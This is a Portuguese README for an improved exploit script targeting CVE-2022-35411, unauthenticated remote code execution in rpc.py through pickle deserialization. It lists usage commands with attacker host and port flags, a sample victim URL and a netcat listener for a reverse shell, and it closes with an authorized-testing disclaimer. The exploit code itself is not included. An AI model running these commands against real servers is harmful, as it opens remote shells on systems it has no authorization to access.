
Exploit para CVE-2022-35411 — RCE não autenticada em rpc.py (<= 0.6.0)
Este é um exploit atualizado e melhorado para CVE-2022-35411, visando versões vulneráveis do rpc.py (<= 0.6.0).
Permite execução remota de código (RCE) não autenticada através da desserialização de pickle do Python.
Exploit original por: Elias Hohl
Melhorado por: x7331 para usabilidade, portabilidade e automação
A vulnerabilidade reside no uso inseguro do módulo pickle do Python pelo rpc.py, permitindo que payloads elaborados executem comandos arbitrários sem autenticação.
v0.4.2 – v0.6.0argparse com flags --lhost, --lport, --target e --dry-run-h / --helppython3 rpc-rce.py --lhost 10.10.14.1 --lport 9001
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --dry-run
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --target http://victim.internal:65432/sayhi
3.xrequests (instalar com pip install requests)nc -lvnp 9001)Este exploit é fornecido apenas para fins educacionais e de teste autorizado. NÃO o utilize em sistemas que você não possui ou para os quais não possui permissão explícita para testar.